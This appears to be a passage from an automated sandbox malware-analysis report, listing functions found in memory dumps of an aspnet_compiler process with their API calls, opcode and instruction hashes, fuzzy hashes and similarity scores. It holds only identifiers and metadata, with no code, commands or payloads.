                                                                                                                                                                        Function 0134A47A, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: closesocket
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2781271927-0
                                                                                                                                                                        • Opcode ID: 431bb707982aa081b75fecc4bc565308be3147f3af6570b70fcfa5860e609b97
                                                                                                                                                                        • Instruction ID: b0b6318beafcb5e68e8e01b0e72299bdcef161ac314e1ebbda9ece3fef4c8caf
                                                                                                                                                                        • Opcode Fuzzy Hash: 431bb707982aa081b75fecc4bc565308be3147f3af6570b70fcfa5860e609b97
                                                                                                                                                                        • Instruction Fuzzy Hash: C301AD308442449FEB12CF19D98876AFBE4EF44325F18C4AADD499F703D278A408CBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134A876, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetErrorMode.KERNELBASE(?), ref: 0134A8A8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                                        • Opcode ID: 01cfb2dc099d7fbc6d753161f74d640f934744ba938bd04df8e089b8912a4002
                                                                                                                                                                        • Instruction ID: 9cd2b719838e5fee40cc9721c496177ff597fadfd52bf10ef4369dd4502b678c
                                                                                                                                                                        • Opcode Fuzzy Hash: 01cfb2dc099d7fbc6d753161f74d640f934744ba938bd04df8e089b8912a4002
                                                                                                                                                                        • Instruction Fuzzy Hash: 47F0FF309402448FEB21CF09D988721FFE4EF04325F08C09ADD4A0F613D374A409CEA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 030F567E, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • KiUserExceptionDispatcher.NTDLL ref: 030F568A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.594950683.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_30f0000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DispatcherExceptionUser
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 6842923-0
                                                                                                                                                                        • Opcode ID: 91b2747417ed9bd559519992e364ec24af3e889fb6e2f5487f172b902772c54f
                                                                                                                                                                        • Instruction ID: 80e372693cbddf61876f31343a052a808892495380fb50a2fdf2ed78b975d147
                                                                                                                                                                        • Opcode Fuzzy Hash: 91b2747417ed9bd559519992e364ec24af3e889fb6e2f5487f172b902772c54f
                                                                                                                                                                        • Instruction Fuzzy Hash: D8B09234202000AF8204DA64C86982CBB61AF8928A394888E940B8B651CE26EC038B40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D5300E, Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596768335.0000000005D50000.00000040.00000001.sdmp, Offset: 05D50000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d50000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 20d22f738bc776a9111d074968dd5161e177b5eac454b11f63655bf0e705ed65
                                                                                                                                                                        • Instruction ID: 6b73f3a9572575e72b5d0a2ea0646309d198d995e03e5c140720ec1ab0f2259f
                                                                                                                                                                        • Opcode Fuzzy Hash: 20d22f738bc776a9111d074968dd5161e177b5eac454b11f63655bf0e705ed65
                                                                                                                                                                        • Instruction Fuzzy Hash: 6221E7B5508341AFD341CF19D840A5BFBE4FB89660F04896EF88897312D330E9048B62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D53A80, Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596768335.0000000005D50000.00000040.00000001.sdmp, Offset: 05D50000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d50000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: ee3590e3bb4f1f211d3295795657a09175d75a50cf6d0f8a2a2539f798f389b9
                                                                                                                                                                        • Instruction ID: 99ecbd5239f8e4850932cf3d025eab907b1196da8142298a4170756ae77f44d5
                                                                                                                                                                        • Opcode Fuzzy Hash: ee3590e3bb4f1f211d3295795657a09175d75a50cf6d0f8a2a2539f798f389b9
                                                                                                                                                                        • Instruction Fuzzy Hash: 5411BAB5508341AFD340CF19D881A5BFBE4FB98664F14896EF898D7311D331E9048FA6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 02F407F4, Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.594905763.0000000002F40000.00000040.00000040.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_2f40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f8653bbf30684fe7f0b91a60002a7a6d81877635eac3769b0b0a14fb86f22765
                                                                                                                                                                        • Instruction ID: 0d280a52acb921b0d43011e44fcb9789ff66bd974ebe1f725f4c97c47cfb8815
                                                                                                                                                                        • Opcode Fuzzy Hash: f8653bbf30684fe7f0b91a60002a7a6d81877635eac3769b0b0a14fb86f22765
                                                                                                                                                                        • Instruction Fuzzy Hash: 7B11B4356442809FD319CB14CA44F25BFA5AB88708F28C5ADEB491B653CFBBD802CA91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 02F407C9, Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.594905763.0000000002F40000.00000040.00000040.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_2f40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 07488b788a95c2b47924114a9216e644df541a0a3819cbd3b21cc02a1e7c7b08
                                                                                                                                                                        • Instruction ID: d6c30a65b344eed2fa5f2fa704c6fd9f0d729a30f7c92c382d6863b46908d941
                                                                                                                                                                        • Opcode Fuzzy Hash: 07488b788a95c2b47924114a9216e644df541a0a3819cbd3b21cc02a1e7c7b08
                                                                                                                                                                        • Instruction Fuzzy Hash: 1E216D3150D3C08FC717CB20C990B55BFB1AF87204F2986EED5845B6A3C77A9856CB92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 02F40798, Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.594905763.0000000002F40000.00000040.00000040.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_2f40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 6db500a518fc0749838e6acb917871afabf92dec5728e3f0d0898ecbc7e5cc8c
                                                                                                                                                                        • Instruction ID: 088cbdb6d52f7103c7a5c9894bbc51dfe332dbddf2681596c209a6ebdacb8598
                                                                                                                                                                        • Opcode Fuzzy Hash: 6db500a518fc0749838e6acb917871afabf92dec5728e3f0d0898ecbc7e5cc8c
                                                                                                                                                                        • Instruction Fuzzy Hash: B31151355493C19FC307CB10C950F55BFB1AF46318F2985EED6848B663CB7A8846CB52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 02F408B0, Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.594905763.0000000002F40000.00000040.00000040.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_2f40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 8d74a29df55c69f98ab7c4b2aae8ba2665a8ebae01658a76b7ab1be4c5fff073
                                                                                                                                                                        • Instruction ID: c4d26a401a05afdd1fc1f63e47cf2ffd18a5be758cb385abb9ca73d07d8e9ad5
                                                                                                                                                                        • Opcode Fuzzy Hash: 8d74a29df55c69f98ab7c4b2aae8ba2665a8ebae01658a76b7ab1be4c5fff073
                                                                                                                                                                        • Instruction Fuzzy Hash: 69F01D35604644DFC316CF00D540F15FBA2EB89718F24C6ADEA491BB52CB77D813DA81
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 02F405F6, Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.594905763.0000000002F40000.00000040.00000040.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_2f40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 20ce26b0d01ef88959bf2353a9a71222ff03b2243301ecd3d7f8fa1194af59fd
                                                                                                                                                                        • Instruction ID: 77f49c70f1d1b1ff7d9e965e83ecc4e91cab46f26fc0f3b5c3f44a460637116f
                                                                                                                                                                        • Opcode Fuzzy Hash: 20ce26b0d01ef88959bf2353a9a71222ff03b2243301ecd3d7f8fa1194af59fd
                                                                                                                                                                        • Instruction Fuzzy Hash: BAE092766446005BD754CF0AEC41456F7D8EB88631718C17FDC0D8B700D635B508CEA6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D53AEB, Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596768335.0000000005D50000.00000040.00000001.sdmp, Offset: 05D50000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d50000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9ebe73ca2a595c7339cf2db533bbd135df2ab805b53b35f4db63a4c9896917e0
                                                                                                                                                                        • Instruction ID: 1905d90bc2ab7d98dd8e9040d1ea151aac0c0efeb099379913b93f2ff5b3b88d
                                                                                                                                                                        • Opcode Fuzzy Hash: 9ebe73ca2a595c7339cf2db533bbd135df2ab805b53b35f4db63a4c9896917e0
                                                                                                                                                                        • Instruction Fuzzy Hash: 8BE0D8B254120067D2508E069C45B12FB9CDB54A31F14C66BED081B302D171B5148AF5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D53083, Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596768335.0000000005D50000.00000040.00000001.sdmp, Offset: 05D50000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d50000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f7342fbfa8d040c2f96484a924083ed9608755c52d4d88d45e0fba9bf2d02701
                                                                                                                                                                        • Instruction ID: fa8bee2577011c92470bcb4ffd3d5ef78aa456576b3158513bd1e46dd906861f
                                                                                                                                                                        • Opcode Fuzzy Hash: f7342fbfa8d040c2f96484a924083ed9608755c52d4d88d45e0fba9bf2d02701
                                                                                                                                                                        • Instruction Fuzzy Hash: A6E0D87254120067D2508F069C45B12FB5CEB54A30F54C65BED081F302D171B5148AF5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 013423F4, Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593784116.0000000001342000.00000040.00000001.sdmp, Offset: 01342000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_1342000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 91db70fcde6862cbc3ae9968c0c52cf8e36ac04c7e1340fe5994757fd855a871
                                                                                                                                                                        • Instruction ID: d2227c62f20532563c0d49c7723624f2c5b9ac6f6920bec5afc0082434db40b5
                                                                                                                                                                        • Opcode Fuzzy Hash: 91db70fcde6862cbc3ae9968c0c52cf8e36ac04c7e1340fe5994757fd855a871
                                                                                                                                                                        • Instruction Fuzzy Hash: D0D05E79205AC14FE3268A1DD2ACBA63FE4EF51B08F4644F9E8009B7A3C768E581D200
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 013423BC, Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593784116.0000000001342000.00000040.00000001.sdmp, Offset: 01342000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_1342000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d001ff8a9cc441db5fa31d628a4750d9e953de0a77fa55d7564f5a317fa868f4
                                                                                                                                                                        • Instruction ID: 730130b5c7ecd394ad96f7f71f9142cc02ecb4bc77281519661b4eb8e4db896e
                                                                                                                                                                        • Opcode Fuzzy Hash: d001ff8a9cc441db5fa31d628a4750d9e953de0a77fa55d7564f5a317fa868f4
                                                                                                                                                                        • Instruction Fuzzy Hash: B1D05E342102814BD716DB0CD698F5A3BE4AB41B04F0644E8BC008B262C7B5E881C600
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Non-executed Functions